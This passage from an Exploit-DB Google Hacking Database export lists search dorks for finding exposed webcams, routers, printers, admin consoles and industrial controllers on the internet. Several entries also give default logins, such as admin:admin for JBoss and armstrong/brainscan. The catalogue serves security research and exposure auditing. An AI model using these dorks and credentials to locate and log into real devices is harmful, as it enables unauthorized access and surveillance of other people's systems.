<querystring>https://www.google.com/search?q=intitle:&quot;webcamXP 5&quot; -download</querystring>
<edb></edb>
<date>2017-06-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>6836</id>
<link>https://www.exploit-db.com/ghdb/6836</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;webcamxp 5&quot; intext: &quot;live stream&quot;</shortDescription>
<textualDescription># Dork: *intitle:&quot;webcamxp 5&quot; intext: &quot;live stream&quot;*
</textualDescription>
<query>intitle:&quot;webcamxp 5&quot; intext: &quot;live stream&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;webcamxp 5&quot; intext: &quot;live stream&quot;</querystring>
<edb></edb>
<date>2021-03-19</date>
<author>Hitesh Parmar</author>
</entry>
<entry>
<id>5851</id>
<link>https://www.exploit-db.com/ghdb/5851</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;webcamXP 5&quot; inurl:8080 'Live'</shortDescription>
<textualDescription>Description:
intitle:&quot;webcamXP 5&quot; inurl:8080 'Live'
intitle:&quot;webcamXP 5&quot; inurl:'/gallery.html' -download
This google dork gives us the live webcamXP camera footages of various
webservers.</textualDescription>
<query>intitle:&quot;webcamXP 5&quot; inurl:8080 'Live'</query>
<querystring>https://www.google.com/search?q=intitle:&quot;webcamXP 5&quot; inurl:8080 'Live'</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Siddhesh Thakur</author>
</entry>
<entry>
<id>7448</id>
<link>https://www.exploit-db.com/ghdb/7448</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;webcamXP 5&quot; inurl:admin.html</shortDescription>
<textualDescription># Google Dork: intitle:&quot;webcamXP 5&quot; inurl:admin.html
# Various Online Devices
# Date:14/10/2021
# Exploit Author: César Hernández Obispo</textualDescription>
<query>intitle:&quot;webcamXP 5&quot; inurl:admin.html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;webcamXP 5&quot; inurl:admin.html</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>6970</id>
<link>https://www.exploit-db.com/ghdb/6970</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;webcamxp&quot; &quot;Flash JPEG Stream&quot;</shortDescription>
<textualDescription># Exploit Title: Various Online Devices
# Google Dork: intitle:&quot;webcamxp&quot; &quot;Flash JPEG Stream&quot;
# Date: 2021-05-21
# Exploit Author: Anmol K Sachan
</textualDescription>
<query>intitle:&quot;webcamxp&quot; &quot;Flash JPEG Stream&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;webcamxp&quot; &quot;Flash JPEG Stream&quot;</querystring>
<edb></edb>
<date>2021-05-28</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>7697</id>
<link>https://www.exploit-db.com/ghdb/7697</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;webcamXP&quot; inurl:8080</shortDescription>
<textualDescription># Google Dork: intitle:&quot;webcamXP&quot; inurl:8080
# Various Online Devices
# Date: 08/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;webcamXP&quot; inurl:8080</query>
<querystring>https://www.google.com/search?q=intitle:&quot;webcamXP&quot; inurl:8080</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>1041</id>
<link>https://www.exploit-db.com/ghdb/1041</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;WEBDVR&quot; -inurl:product -inurl:demo</shortDescription>
<textualDescription>DVR is a generic name used to describe the recording process with a digital cam (digitial video recording). This search finds several manufactors like Kodicom DVR Systems, i3 DVR, and others I can't identify.</textualDescription>
<query>intitle:&quot;WEBDVR&quot; -inurl:product -inurl:demo</query>
<querystring>https://www.google.com/search?q=intitle:%22WEBDVR%22+-inurl:product+-inurl:demo&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-07-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>4080</id>
<link>https://www.exploit-db.com/ghdb/4080</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;WebService Web Service&quot; ext:asmx</shortDescription>
<textualDescription>Servers with &quot;Web Service commands activated&quot;.
Dork by Rootkit Pentester.</textualDescription>
<query>intitle:&quot;WebService Web Service&quot; ext:asmx</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WebService Web Service&quot; ext:asmx</querystring>
<edb></edb>
<date>2015-09-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1277</id>
<link>https://www.exploit-db.com/ghdb/1277</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Webview Logon Page&quot;</shortDescription>
<textualDescription>This is the web interface for Alcatel's Omniswitch. Default login is: admin/switch.</textualDescription>
<query>http://www.google.com/search?q=intitle:%22Webview+Logon+Page%22&amp;filter=0</query>
<querystring>https://www.google.com/search?q=intitle:%22Webview+Logon+Page%22&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4484</id>
<link>https://www.exploit-db.com/ghdb/4484</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Welcome to ZyXEL&quot; -zyxel.com</shortDescription>
<textualDescription>Finds ZyXEL routers, IP cameras, and other devices
Dxtroyer</textualDescription>
<query>intitle:&quot;Welcome to ZyXEL&quot; -zyxel.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Welcome to ZyXEL&quot; -zyxel.com</querystring>
<edb></edb>
<date>2017-05-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>7097</id>
<link>https://www.exploit-db.com/ghdb/7097</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Welcome to&quot; intext:&quot;configuration interface&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Welcome to&quot; intext:&quot;configuration interface&quot;
# Category: Various Online Devices
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Welcome to&quot; intext:&quot;configuration interface&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Welcome to&quot; intext:&quot;configuration interface&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7163</id>
<link>https://www.exploit-db.com/ghdb/7163</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Welcome-netis Wireless&quot;</shortDescription>
<textualDescription># Google Dork:intitle:&quot;Welcome-netis Wireless&quot;
# Various Online Devices
# Date: 01/09/2021
# Exploit Author: J. Igor Melo
</textualDescription>
<query>intitle:&quot;Welcome-netis Wireless&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Welcome-netis Wireless&quot;</querystring>
<edb></edb>
<date>2021-09-07</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6972</id>
<link>https://www.exploit-db.com/ghdb/6972</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;WF Series&quot; inurl:PRTINFO.html</shortDescription>
<textualDescription># Exploit Title: Various Online Devices
# Google Dork: intitle:&quot;WF Series&quot; inurl:PRTINFO.html
# Date: 2021-05-25
# Exploit Author: Anmol K Sachan
</textualDescription>
<query>intitle:&quot;WF Series&quot; inurl:PRTINFO.html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WF Series&quot; inurl:PRTINFO.html</querystring>
<edb></edb>
<date>2021-06-01</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>5691</id>
<link>https://www.exploit-db.com/ghdb/5691</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;WSO2 Management Console&quot;</shortDescription>
<textualDescription>Google dork description: Instances of WSO2 Carbon, an opensource middleware
platform.
Google Search: intitle:&quot;WSO2 Management Console&quot;
Submitted by: Alfie
Twitter: https://twitter.com/emenalf
</textualDescription>
<query>intitle:&quot;WSO2 Management Console&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WSO2 Management Console&quot;</querystring>
<edb></edb>
<date>2020-01-17</date>
<author>Alfie</author>
</entry>
<entry>
<id>1280</id>
<link>https://www.exploit-db.com/ghdb/1280</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;WxGoos-&quot; (&quot;Camera image&quot;|&quot;60 seconds&quot; )</shortDescription>
<textualDescription>This is used in serverrooms and such where climate conditions are crucial to hardware health. If an attacker were to guess the password for the configuration page, then he can find POP3 passwords in plain text in the HTML source code.It runs on &quot;I.T. Watchdogs, Inc. Embedded Web Server&quot;</textualDescription>
<query>intitle:&quot;WxGoos-&quot; (&quot;Camera image&quot;|&quot;60 seconds&quot; )</query>
<querystring>https://www.google.com/search?num=50&amp;&amp;q=intitle%3A%22WxGoos-%22+%28%22Camera+image%22%7C%2260+seconds%22+%29</querystring>
<edb></edb>
<date>2006-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>7090</id>
<link>https://www.exploit-db.com/ghdb/7090</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;xerox&quot; inurl:i_index</shortDescription>
<textualDescription># Google Dork: intitle:&quot;xerox&quot; inurl:i_index
# Category: Various Online Devices
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;xerox&quot; inurl:i_index</query>
<querystring>https://www.google.com/search?q=intitle:&quot;xerox&quot; inurl:i_index</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7222</id>
<link>https://www.exploit-db.com/ghdb/7222</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;yawcam&quot; &quot;It's a webcam!&quot; &quot;user&quot; &quot;pass&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;yawcam&quot; &quot;It's a webcam!&quot; &quot;user&quot; &quot;pass&quot;
# Various Online Devices
# Date: 23/07/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;yawcam&quot; &quot;It's a webcam!&quot; &quot;user&quot; &quot;pass&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;yawcam&quot; &quot;It's a webcam!&quot; &quot;user&quot; &quot;pass&quot;</querystring>
<edb></edb>
<date>2021-09-15</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>4697</id>
<link>https://www.exploit-db.com/ghdb/4697</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Yawcam&quot; inurl:8081</shortDescription>
<textualDescription># Dork Title: [unprotected Yawcam webcam]
# Google Dork: [intitle:&quot;Yawcam&quot; inurl:8081]
# Description: Access to unprotected Yawcam webcams via browser.
# Date: [01/03/2018]
# Dork Author: [Sohaib E.B.]
# Vendor Homepage: [http://www.yawcam.com]
</textualDescription>
<query>intitle:&quot;Yawcam&quot; inurl:8081</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Yawcam&quot; inurl:8081</querystring>
<edb></edb>
<date>2018-03-14</date>
<author>Sohaib E.B.</author>
</entry>
<entry>
<id>6939</id>
<link>https://www.exploit-db.com/ghdb/6939</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Yealink&quot; inurl:&quot;servlet?m=&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Yealink&quot; inurl:&quot;servlet?m=&quot;</textualDescription>
<query>intitle:&quot;Yealink&quot; inurl:&quot;servlet?m=&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Yealink&quot; inurl:&quot;servlet?m=&quot;</querystring>
<edb></edb>
<date>2021-05-18</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7283</id>
<link>https://www.exploit-db.com/ghdb/7283</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Youless energy monitor&quot; &quot;Model&quot; &quot;Firmware&quot; &quot;www.youless.nl&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Youless energy monitor&quot; &quot;Model&quot; &quot;Firmware&quot; &quot;www.youless.nl&quot;
# Various Online Devices
# Date:17/09/2021
# Exploit Author: Mugdha Peter Bansode</textualDescription>
<query>intitle:&quot;Youless energy monitor&quot; &quot;Model&quot; &quot;Firmware&quot; &quot;www.youless.nl&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Youless energy monitor&quot; &quot;Model&quot; &quot;Firmware&quot; &quot;www.youless.nl&quot;</querystring>
<edb></edb>
<date>2021-09-23</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>1419</id>
<link>https://www.exploit-db.com/ghdb/1419</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Your Network Device&quot; Status (LAN | WAN)</shortDescription>
<textualDescription>Login page for the Solwise Sar715+ ADSL Router from solwise.co.uk. Thanks to jeffball55 for the identification of this &quot;victim&quot; ;)</textualDescription>
<query>intitle:&quot;Your Network Device&quot; Status (LAN | WAN)</query>
<querystring>https://www.google.com/search?q=intitle:%22Your+Network+Device%22+Status+(LAN+%7C+WAN)&amp;filter=0</querystring>
<edb></edb>
<date>2006-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>856</id>
<link>https://www.exploit-db.com/ghdb/856</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&amp;quot;Brother&amp;quot; intext:&amp;quot;View Configuration&amp;quot; intext:&amp;quot;Brother Industries, Ltd.&amp;quot;</shortDescription>
<textualDescription>Finds a real bunch of Brother printers</textualDescription>
<query>intitle:&quot;Brother&quot; intext:&quot;View Configuration&quot; intext:&quot;Brother Industries, Ltd.&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Brother%22+intext%3A%22View+Configuration%22+intext%3A%22Brother+Industries%2C+Ltd%2E%22</querystring>
<edb></edb>
<date>2005-02-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>854</id>
<link>https://www.exploit-db.com/ghdb/854</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&amp;quot;Connection Status&amp;quot; intext:&amp;quot;Current login&amp;quot;</shortDescription>
<textualDescription>This is an intriguing way of finding various '5861 DMT Routers' - the presence of a web-interface to the router also indicates the presence of a telnet interface to the router!</textualDescription>
<query>intitle:&quot;Connection Status&quot; intext:&quot;Current login&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Connection+Status%22+intext%3A%22Current+login%22</querystring>
<edb></edb>
<date>2005-02-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>4848</id>
<link>https://www.exploit-db.com/ghdb/4848</link>
<category>Various Online Devices</category>
<shortDescription>intitle:'System Web Interface: WATTrouter M'</shortDescription>
<textualDescription>Dork about WATTrouter M SSR - programmable controller to optimize
self-consumption of energy produced by photovoltaic or wind power plant
intitle:'System Web Interface: WATTrouter M'
Author : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R
</textualDescription>
<query>intitle:'System Web Interface: WATTrouter M'</query>
<querystring>https://www.google.com/search?q=intitle:'System Web Interface: WATTrouter M'</querystring>
<edb></edb>
<date>2018-06-06</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>5152</id>
<link>https://www.exploit-db.com/ghdb/5152</link>
<category>Various Online Devices</category>
<shortDescription>intitle:'Welcome to JBoss AS'</shortDescription>
<textualDescription>*Search: * JBoss Administrator Console
*Google Dorks:*intitle:'Welcome to JBoss AS'
*Default Credentials:* admin:admin
*Author:* Rishabh Sharma (Lazy Hacker)
</textualDescription>
<query>intitle:'Welcome to JBoss AS'</query>
<querystring>https://www.google.com/search?q=intitle:'Welcome to JBoss AS'</querystring>
<edb></edb>
<date>2019-03-11</date>
<author>Lazy Hacker</author>
</entry>
<entry>
<id>6994</id>
<link>https://www.exploit-db.com/ghdb/6994</link>
<category>Various Online Devices</category>
<shortDescription>intitle:(&quot;Canon&quot; + &quot;series Network Configuration&quot; &quot;Basic Information&quot;) + &quot;JavaScript is not enabled&quot;</shortDescription>
<textualDescription># Google Dork: intitle:(&quot;Canon&quot; + &quot;series Network Configuration&quot; &quot;Basic Information&quot;) + &quot;JavaScript is not enabled&quot;
# Various online devices (Canon).
# Date: 26/05/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:(&quot;Canon&quot; + &quot;series Network Configuration&quot; &quot;Basic Information&quot;) + &quot;JavaScript is not enabled&quot;</query>
<querystring>https://www.google.com/search?q=intitle:(&quot;Canon&quot; + &quot;series Network Configuration&quot; &quot;Basic Information&quot;) + &quot;JavaScript is not enabled&quot;</querystring>
<edb></edb>
<date>2021-06-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6807</id>
<link>https://www.exploit-db.com/ghdb/6807</link>
<category>Various Online Devices</category>
<shortDescription>intitle:(&quot;OnCell Web Console&quot; | &quot;Series Web Console&quot; | &quot;-HSPA Series Web&quot; | &quot;-HSDPA Series Web&quot;) &quot;MOXA OnCell&quot; &quot;Username :&quot; &quot;Password :&quot; -pdf</shortDescription>
<textualDescription># Google Dork: intitle:(&quot;OnCell Web Console&quot; | &quot;Series Web Console&quot; | &quot;-HSPA Series Web&quot; | &quot;-HSDPA Series Web&quot;) &quot;MOXA OnCell&quot; &quot;Username :&quot; &quot;Password :&quot; -pdf
# Various online devices.
# Date: 25/2/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:(&quot;OnCell Web Console&quot; | &quot;Series Web Console&quot; | &quot;-HSPA Series Web&quot; | &quot;-HSDPA Series Web&quot;) &quot;MOXA OnCell&quot; &quot;Username :&quot; &quot;Password :&quot; -pdf</query>
<querystring>https://www.google.com/search?q=intitle:(&quot;OnCell Web Console&quot; | &quot;Series Web Console&quot; | &quot;-HSPA Series Web&quot; | &quot;-HSDPA Series Web&quot;) &quot;MOXA OnCell&quot; &quot;Username :&quot; &quot;Password :&quot; -pdf</querystring>
<edb></edb>
<date>2021-02-25</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5856</id>
<link>https://www.exploit-db.com/ghdb/5856</link>
<category>Various Online Devices</category>
<shortDescription>intitle:(&quot;Solr admin page&quot;) AND intext:(&quot;Make a Query&quot;)</shortDescription>
<textualDescription># Dork #
intitle:(&quot;Solr admin page&quot;) AND intext:(&quot;Make a Query&quot;)
</textualDescription>
<query>intitle:(&quot;Solr admin page&quot;) AND intext:(&quot;Make a Query&quot;)</query>
<querystring>https://www.google.com/search?q=intitle:(&quot;Solr admin page&quot;) AND intext:(&quot;Make a Query&quot;)</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>5855</id>
<link>https://www.exploit-db.com/ghdb/5855</link>
<category>Various Online Devices</category>
<shortDescription>intitle:(&quot;Solr Admin&quot;) AND intext:(&quot;Dashboard&quot; AND &quot;Corporation&quot;)</shortDescription>
<textualDescription># Dork #
intitle:(&quot;Solr Admin&quot;) AND intext:(&quot;Dashboard&quot; AND &quot;Corporation&quot;)
This dork possibly allow to view Solr Admin Dashboard.</textualDescription>
<query>intitle:(&quot;Solr Admin&quot;) AND intext:(&quot;Dashboard&quot; AND &quot;Corporation&quot;)</query>
<querystring>https://www.google.com/search?q=intitle:(&quot;Solr Admin&quot;) AND intext:(&quot;Dashboard&quot; AND &quot;Corporation&quot;)</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Debashis Pal</author>
</entry>
<entry>
<id>6806</id>
<link>https://www.exploit-db.com/ghdb/6806</link>
<category>Various Online Devices</category>
<shortDescription>intitle:(&quot;WebRTU z2&quot; | &quot;WebRTU z1&quot;) -pdf</shortDescription>
<textualDescription># Google Dork: intitle:(&quot;WebRTU z2&quot; | &quot;WebRTU z1&quot;) -pdf
# Various online devices (mostly industrial systems).
# Date: 25/2/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:(&quot;WebRTU z2&quot; | &quot;WebRTU z1&quot;) -pdf</query>
<querystring>https://www.google.com/search?q=intitle:(&quot;WebRTU z2&quot; | &quot;WebRTU z1&quot;) -pdf</querystring>
<edb></edb>
<date>2021-02-25</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4153</id>
<link>https://www.exploit-db.com/ghdb/4153</link>
<category>Various Online Devices</category>
<shortDescription>intitle:(build 13064) - Info</shortDescription>
<textualDescription>Dork for DD-WRT routers with V24 build number 13064.
Author: Augusto Pereira
http://www.augustopereira.com.br</textualDescription>
<query>intitle:(build 13064) - Info</query>
<querystring>https://www.google.com/search?q=intitle:(build 13064) - Info</querystring>
<edb></edb>
<date>2015-12-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5375</id>
<link>https://www.exploit-db.com/ghdb/5375</link>
<category>Various Online Devices</category>
<shortDescription>intitle:apache couchdb - futon: overview inurl:/_utils</shortDescription>
<textualDescription>Couchdb Web Panel
# Google Dorks:
intitle:apache couchdb - futon: overview inurl:/_utils
intitle:apache couchdb - futon: browse database inurl:/_utils
# Date: [17-08-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>intitle:apache couchdb - futon: overview inurl:/_utils</query>
<querystring>https://www.google.com/search?q=intitle:apache couchdb - futon: overview inurl:/_utils</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>4656</id>
<link>https://www.exploit-db.com/ghdb/4656</link>
<category>Various Online Devices</category>
<shortDescription>intitle:Armstrong Hot Water System Monitoring</shortDescription>
<textualDescription>Armstrong Hot water System Monitoring
default credentials:
user: armstrong
pass: brainscan
--
@ak1t4
WhiteHat Hacker - Security Analyst - Bug Bounty Hunter
hackerone.com/ak1t4
twitter.com/knowledge_2014
</textualDescription>
<query>intitle:Armstrong Hot Water System Monitoring</query>
<querystring>https://www.google.com/search?q=intitle:Armstrong Hot Water System Monitoring</querystring>
<edb></edb>
<date>2018-01-11</date>
<author>ak1t4</author>
</entry>
<entry>
<id>897</id>
<link>https://www.exploit-db.com/ghdb/897</link>
<category>Various Online Devices</category>
<shortDescription>intitle:asterisk.management.portal web-access</shortDescription>
<textualDescription>Coalescent Systems Inc. launched The Asterisk Management Portal project to bring together best-of-breed applications to produce a &quot;canned&quot; (but fully functional) turn-key small business phone system based on The Asterisk Open Source PBX.</textualDescription>
<query>intitle:asterisk.management.portal web-access</query>
<querystring>https://www.google.com/search?q=intitle%3Aasterisk.management.portal+web-access&amp;c2coff=1&amp;rls=org.mozilla%3Aen-US%3Aofficial</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>1233</id>
<link>https://www.exploit-db.com/ghdb/1233</link>
<category>Various Online Devices</category>
<shortDescription>intitle:Axis inurl:&quot;/admin/admin.shtml&quot;</shortDescription>
<textualDescription>similar searchs exist. This search finds a few more results as well as access to the Admin area or a login screen depending on Cameras configuration.</textualDescription>
<query>intitle:Axis inurl:&quot;/admin/admin.shtml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:Axis+inurl:%22/admin/admin.shtml%22&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-12-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>1197</id>
<link>https://www.exploit-db.com/ghdb/1197</link>
<category>Various Online Devices</category>
<shortDescription>intitle:Cisco &quot;You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator&quot;</shortDescription>
<textualDescription>Login pages for Ciso VPN Concentrator stuff</textualDescription>
<query>intitle:Cisco &quot;You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator&quot;</query>
<querystring>https://www.google.com/search?q=intitle:Cisco+%22You+are+using+an+old+browser+or+have+disabled+javascript.+You+must+use+version+4+or+higher+of+Netscape+Navigator/Communicator%22&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>4087</id>
<link>https://www.exploit-db.com/ghdb/4087</link>
<category>Various Online Devices</category>
<shortDescription>intitle:Global Traffic Statistics &quot;Ntop&quot;</shortDescription>
<textualDescription>Google dork Description: View Global Traffic Statistics
Google search: intitle:Global Traffic Statistics &quot;Ntop&quot;
Submited: 2015-10-3
Note:
Ntop shows the current network usage. It displays a list of hosts that
are currently using the network and reports information concerning the
IP (Internet Protocol) traffic generated by each host.</textualDescription>
<query>intitle:Global Traffic Statistics &quot;Ntop&quot;</query>
<querystring>https://www.google.com/search?q=intitle:Global Traffic Statistics &quot;Ntop&quot;</querystring>
<edb></edb>
<date>2015-10-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>5371</id>
<link>https://www.exploit-db.com/ghdb/5371</link>
<category>Various Online Devices</category>
<shortDescription>intitle:Grafana - Home inurl:/orgid</shortDescription>
<textualDescription>Finding Grafana Dashboards
# Google Dork: intitle:Grafana - Home inurl:/orgid
# Date: [16-08-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>intitle:Grafana - Home inurl:/orgid</query>
<querystring>https://www.google.com/search?q=intitle:Grafana - Home inurl:/orgid</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>892</id>
<link>https://www.exploit-db.com/ghdb/892</link>
<category>Various Online Devices</category>
<shortDescription>intitle:HomeSeer.Web.Control | Home.Status.Events.Log</shortDescription>
<textualDescription>HomeSeer (http://www.homeseer.com/) provides a well known home automation solution (software + hardware)This dork will find web interfaces of homeseer.</textualDescription>
<query>intitle:HomeSeer.Web.Control | Home.Status.Events.Log</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3AHomeSeer.Web.Control+%7C+Home.Status.Events.Log</querystring>
<edb></edb>
<date>2005-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>6940</id>
<link>https://www.exploit-db.com/ghdb/6940</link>
<category>Various Online Devices</category>
<shortDescription>intitle:HP LASERJET PRO MFP inurl:/SSI/index.htm</shortDescription>
<textualDescription># Exploit Title: Discover Publicly Available Devices
# Google Dork: intitle:HP LASERJET PRO MFP inurl:/SSI/index.htm
# Date: 2021-05-14
# Exploit Author: Anmol K Sachan
</textualDescription>
<query>intitle:HP LASERJET PRO MFP inurl:/SSI/index.htm</query>
<querystring>https://www.google.com/search?q=intitle:HP LASERJET PRO MFP inurl:/SSI/index.htm</querystring>
<edb></edb>
<date>2021-05-18</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>1069</id>
<link>https://www.exploit-db.com/ghdb/1069</link>
<category>Various Online Devices</category>
<shortDescription>intitle:iDVR -intitle:&quot;com | net | shop&quot; -inurl:&quot;asp | htm | pdf | html | php | shtml | com | at | cgi | tv&quot;</shortDescription>
<textualDescription>Online camera. Default login is administrator and password blank. Video server runs default on port 2000. There is an application DVR Center that is used to connect to server and manage recorded videos.</textualDescription>
<query>intitle:iDVR -intitle:&quot;com | net | shop&quot; -inurl:&quot;asp | htm | pdf | html | php | shtml | com | at | cgi | tv&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3AiDVR+-intitle%3A%22com+%7C+net+%7C+shop%22+-inurl%3A%22asp+%7C+htm+%7C+pdf+%7C+html+%7C+php+%7C+shtml+%7C+com+%7C+at+%7C+cgi+%7C+tv%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-08-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4113</id>
<link>https://www.exploit-db.com/ghdb/4113</link>
<category>Various Online Devices</category>
<shortDescription>intitle:index.of inurl:openwebmail -site:openwebmail.org</shortDescription>
<textualDescription>Sites with openwebmail installs.
Decoy</textualDescription>
<query>intitle:index.of inurl:openwebmail -site:openwebmail.org</query>
<querystring>https://www.google.com/search?q=intitle:index.of inurl:openwebmail -site:openwebmail.org</querystring>
<edb></edb>
<date>2015-11-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>929</id>
<link>https://www.exploit-db.com/ghdb/929</link>
<category>Various Online Devices</category>
<shortDescription>intitle:jdewshlp &quot;Welcome to the Embedded Web Server!&quot;</shortDescription>
<textualDescription>HP Officejet help page. Remove &quot;help.html&quot; for main page.</textualDescription>
<query>intitle:jdewshlp &quot;Welcome to the Embedded Web Server!&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3Ajdewshlp+%22Welcome+to+the+Embedded+Web+Server%21%22</querystring>
<edb></edb>
<date>2005-04-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>6992</id>
<link>https://www.exploit-db.com/ghdb/6992</link>
<category>Various Online Devices</category>
<shortDescription>intitle:LANCOM &quot;A webbrowser with active JavaScript support is required.&quot;</shortDescription>
<textualDescription># Exploit Title: Various Online Devices
# Google Dork: intitle:LANCOM &quot;A webbrowser with active JavaScript support is required.&quot;
# Date: 2021-05-20
# Exploit Author: Anmol K Sachan
</textualDescription>
<query>intitle:LANCOM &quot;A webbrowser with active JavaScript support is required.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:LANCOM &quot;A webbrowser with active JavaScript support is required.&quot;</querystring>
<edb></edb>
<date>2021-06-07</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>4356</id>
<link>https://www.exploit-db.com/ghdb/4356</link>
<category>Various Online Devices</category>
<shortDescription>intitle:Leaf PHP Mailer by [leafmailer.pw] ext:php</shortDescription>
<textualDescription>Leaf PHP Mailer by [leafmailer.pw]
Enjoy with healthy.
Dork by INILERM</textualDescription>
<query>intitle:Leaf PHP Mailer by [leafmailer.pw] ext:php</query>
<querystring>https://www.google.com/search?q=intitle:Leaf PHP Mailer by [leafmailer.pw] ext:php</querystring>
<edb></edb>
<date>2016-11-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>870</id>
<link>https://www.exploit-db.com/ghdb/870</link>
<category>Various Online Devices</category>
<shortDescription>intitle:Linksys site:ourlinksys.com</shortDescription>
<textualDescription>Ourlinksys.com DDNS entries pointing to Linksys web enabled cameras</textualDescription>
<query>intitle:Linksys site:ourlinksys.com</query>
